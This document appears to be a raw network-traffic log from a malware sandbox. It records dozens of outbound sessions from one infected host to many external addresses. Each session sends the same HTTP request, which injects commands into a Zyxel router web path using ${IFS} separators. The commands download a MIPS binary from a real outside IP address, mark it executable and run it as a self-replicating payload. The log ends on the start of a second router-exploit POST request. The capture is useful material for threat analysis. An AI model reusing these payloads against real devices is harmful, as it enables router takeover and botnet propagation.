                                                Jan 28, 2024 10:16:33.935167074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6706192.168.2.236028691.175.174.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935194016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6707192.168.2.2336950120.18.93.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935210943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6708192.168.2.2339808119.199.70.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935240984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6709192.168.2.234663889.241.90.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935291052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6710192.168.2.233411031.143.115.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935309887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6711192.168.2.235919451.181.45.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935348988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6712192.168.2.2333930111.105.2.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935352087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6713192.168.2.233769078.163.157.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935391903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6714192.168.2.234805470.129.212.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935415983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6715192.168.2.235200242.248.208.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935441017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6716192.168.2.233367625.10.110.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935491085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6717192.168.2.235082824.13.114.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935524940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6718192.168.2.233756640.236.20.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935559034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6719192.168.2.235816299.173.99.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935580969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6720192.168.2.233535042.90.41.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935589075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6721192.168.2.2359512170.130.159.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935628891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6722192.168.2.234709881.5.3.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935637951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6723192.168.2.234289464.114.103.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935684919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6724192.168.2.234988066.185.54.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935715914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6725192.168.2.2347386163.174.119.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935770035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6726192.168.2.2332800110.158.85.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935790062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6727192.168.2.234584449.169.239.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935832024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6728192.168.2.2339964135.159.12.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.938240051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6729192.168.2.2345380222.27.8.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.938275099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6730192.168.2.234374438.14.254.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939028025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6731192.168.2.2337094148.93.96.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939054966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6732192.168.2.2360998176.134.166.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939066887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6733192.168.2.2345204184.104.42.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939111948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6734192.168.2.2358948106.165.210.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939135075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6735192.168.2.233290231.144.89.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939184904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6736192.168.2.233837266.239.214.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939208031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6737192.168.2.235783699.230.83.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939250946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6738192.168.2.235599480.108.123.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939300060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6739192.168.2.2354692115.66.250.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939306974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6740192.168.2.233590242.48.238.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939352989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6741192.168.2.234917473.125.62.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939369917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6742192.168.2.234080442.77.150.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939388990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6743192.168.2.235771644.146.102.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939419985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6744192.168.2.234230072.133.236.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939471006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6745192.168.2.23452065.100.23.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939493895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6746192.168.2.2345006192.0.13.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939527035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6747192.168.2.2356610174.140.87.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939572096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6748192.168.2.2357988186.255.35.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939593077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6749192.168.2.2353032188.250.218.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939625025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6750192.168.2.2345410190.200.228.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939656019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6751192.168.2.2347118166.47.39.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939691067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6752192.168.2.2334730212.251.253.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939706087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6753192.168.2.2344280147.143.132.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939733028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6754192.168.2.233845017.114.122.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939752102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6755192.168.2.235064618.153.188.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939763069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6756192.168.2.2344442122.136.54.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939836979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6757192.168.2.2351324114.51.126.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939851046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6758192.168.2.2335612166.150.246.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939870119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6759192.168.2.2347770196.155.150.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939902067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6760192.168.2.2355470184.2.74.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939939976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6761192.168.2.235271054.59.246.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.939974070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6762192.168.2.234943074.126.48.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.940021992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6763192.168.2.2340546174.13.24.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.940042019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6764192.168.2.2338536162.122.105.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.940063953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6765192.168.2.2350028110.136.50.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.940063953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6766192.168.2.2338166188.164.14.598080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.607281923 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
